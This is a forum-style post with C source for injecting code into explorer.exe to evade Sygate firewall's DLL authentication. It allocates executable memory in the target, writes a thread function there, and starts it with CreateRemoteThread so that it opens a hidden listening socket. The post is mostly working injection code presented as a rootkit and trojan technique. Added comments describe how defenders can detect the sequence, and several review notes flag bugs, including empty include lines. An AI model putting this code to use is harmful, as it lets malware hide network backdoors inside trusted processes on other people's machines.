bypass dll authentication in sygate and such
Sygate uses a very 'spiff' method that limits injecting a DLL into a process, a popular method for rootkits and trojans alike. This is just some example code to bypass Sygate's DLL authentication; it's very simple, but it's just to get the concept across. It functions by allocating a function in a remote process (in this example, explorer.exe) and then executing it as a thread. The thread then sets up a listening socket, all of which should bypass Sygate's DLL authentication.
I'm not a big fan of commenting, so if you have any questions, just give me the line number and I will explain it.
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
/*
 * Function-pointer types for the Winsock and kernel32 routines the injected
 * thread calls. Once ThreadProc has been copied into another process it can
 * no longer rely on this executable's import table, so every API it uses is
 * reached through one of these pointers, resolved at run time in ThreadProc
 * via the GetProcAddress pointer carried in INJINFO.
 */
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
/* The two kernel32 entry points main() looks up and passes along in INJINFO. */
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
/*
 * Parameter block that main() writes into the target process with
 * WriteProcessMemory and passes to the remote thread as its LPVOID argument.
 *
 * Every string is stored inline as a fixed-size char array instead of a
 * char pointer: a pointer into the injector's address space would be
 * meaningless inside the target, whereas the inline bytes travel with the
 * struct. The library name and export names are what ThreadProc feeds to
 * LoadLibraryA/GetProcAddress; c_data is the buffer ThreadProc sends to
 * each accepted client (the full 45 bytes are sent, see ThreadProc).
 *
 * LoadLib and GetProcAddr are left NULL in the static initializer and
 * filled in by main() before the block is copied out.
 */
typedef struct _INJINFO
{
    char c_Lib[16];          /* DLL to load, e.g. "ws2_32.dll"            */
    char c_WSAStartup[12];   /* export names resolved via GetProcAddr ... */
    char c_Socket[8];
    char c_Bind[8];
    char c_Listen[8];
    char c_Accept[8];
    char c_CloseSocket[16];
    char c_send[8];
    char c_data[45];         /* payload sent to every client, whole buffer */
    LPLoadLibrary LoadLib;       /* kernel32!LoadLibraryA, set by main()    */
    LPGetProcAddress GetProcAddr; /* kernel32!GetProcAddress, set by main() */
} INJINFO, *PINJINFO;
/*
 * Body of the thread that runs inside the target process.
 *
 * main() copies the raw bytes from ThreadProc up to end_proc into the target
 * and starts them with CreateRemoteThread, so this function must be
 * self-contained: it may touch nothing outside itself except through the
 * INJINFO block it receives in lpParams. Comments are free, but adding any
 * code here changes the byte range that main() copies.
 *
 * lpParams: pointer (valid in the target process) to the INJINFO block
 *           written by main().
 * Returns 0 once the accept loop ends; the loop only ends when accept()
 * fails, so in practice the thread runs until the socket breaks.
 *
 * NOTE(review): none of the Winsock return values (WSAStartup, socket,
 * bind, listen, send) are checked; a failure at any step simply carries the
 * bad handle forward into the next call.
 *
 * From a defender's point of view, the observable result of this routine
 * is a new listening TCP socket owned by the host process (explorer.exe in
 * main()), with no corresponding module load in that process — which is
 * exactly the condition DLL-based allow-listing does not see. Correlating
 * the socket with the remote-thread creation in main() is the detection.
 */
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
    PINJINFO info = (PINJINFO)lpParams;
    /* Load ws2_32 and resolve each export by the names carried in INJINFO,
       using only the two kernel32 pointers handed over by main(). */
    HMODULE hLib = info->LoadLib( info->c_Lib );
    LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
    LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
    LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
    LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
    LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
    LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
    LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
    SOCKADDR_IN sAddr;
    sAddr.sin_addr.s_addr = INADDR_ANY;
    /* NOTE(review): stored as-is, without htons(), so the port actually
       bound is the byte-swapped value rather than the literal 0xDEAD. */
    sAddr.sin_port = 0xDEAD;
    sAddr.sin_family = AF_INET;
    WSADATA wsa;
    wsastartup( 0x0202, &wsa );   /* request Winsock 2.2 */
    SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
    wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
    wsalisten( ServerSocket, 5 );
    SOCKET cli;
    /* Accept clients forever; each one is sent the 45-byte c_data buffer.
       The client socket is never closed here. */
    while (true)
    {
        cli = wsaaccept( ServerSocket, NULL, NULL );
        if ( cli == SOCKET_ERROR )
            break;
        wsasend( cli, info->c_data, 45, 0 );
    }
    wsaclosesocket( ServerSocket );
    return 0;
}
/*
 * Empty naked function that serves only as an address marker: main()
 * computes the number of bytes to copy as end_proc - ThreadProc.
 *
 * NOTE(review): this assumes the compiler and linker emit end_proc
 * immediately after ThreadProc and in source order, which is not something
 * the language guarantees (function reordering, incremental linking or
 * inlining can break it).
 */
static void __declspec( naked ) end_proc()
{
}
/*
 * Static template for the parameter block. The first eight strings are the
 * library and export names ThreadProc resolves; "slutted" is the c_data
 * payload (the array is 45 bytes, so the bytes after the terminator are
 * zero-filled by the aggregate initializer and go out as padding, since
 * ThreadProc sends the whole buffer). The two trailing NULLs are LoadLib
 * and GetProcAddr, assigned in main().
 */
INJINFO info =
{
    "ws2_32.dll",
    "WSAStartup",
    "socket",
    "bind",
    "listen",
    "accept",
    "closesocket",
    "send",
    "slutted",
    NULL,
    NULL
};
/*
 * Injector: copies ThreadProc and the INJINFO block into explorer.exe and
 * runs ThreadProc there as a new thread.
 *
 * Every step of this is ordinary, well-instrumented Win32 behaviour, which is
 * what makes it detectable even when module allow-listing is blind to it:
 * OpenProcess with PROCESS_ALL_ACCESS on explorer.exe, an RWX VirtualAllocEx
 * in that process, WriteProcessMemory of the code bytes, and a
 * CreateRemoteThread whose start address is not backed by any module. That
 * sequence is the signal to alert on, not the DLL load it deliberately avoids.
 *
 * NOTE(review): the format strings below contain "/n" where "\n" was
 * presumably intended (likely lost in transcription); they are left as-is.
 */
int main(int argc, char* argv[])
{
    /* Resolve LoadLibraryA/GetProcAddress in this process and pass the raw
       pointers to the target. NOTE(review): this only works because kernel32
       is assumed to be mapped at the same base address in both processes. */
    HMODULE hLib = LoadLibrary( "kernel32.dll" );
    info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
    info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
    /* Locate explorer.exe through the taskbar window it owns. */
    DWORD dwPID;
    GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
    printf( "explorer pid: 0x%x/n", dwPID );
    HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
    if ( hProcess == NULL )
    {
        printf( "error opening process/n" );
        return 0;
    }
    /* Size of the code to copy: from ThreadProc up to the end_proc marker.
       NOTE(review): the DWORD casts truncate pointers on a 64-bit build; this
       presumes a 32-bit executable. */
    DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
    printf( "proc size: %u/n", ProcSize );
    /* Executable region for the code, plus a 1024-byte region for INJINFO
       (larger than sizeof(info)). */
    LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
    if ( !lpProc || !lpParams )
    {
        printf( "error allocating mem/n" );
        return 0;
    }
    /* NOTE(review): %X with pointer arguments; %p would be the matching specifier. */
    printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
    DWORD dwWritten;
    /* NOTE(review): neither WriteProcessMemory result nor dwWritten is checked. */
    WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
    WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
    printf( "memory written/n" );
    DWORD ThreadID;
    HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
    if ( hThread == NULL )
    {
        printf( "error creating thread/n" );
    }
    else
    {
        /* ThreadProc only returns when accept() fails, so this wait — and
           the cleanup after it — normally never completes. */
        WaitForSingleObject( hThread, INFINITE );
    }
    VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
    VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
    printf( "done/n" );
    return 0;
}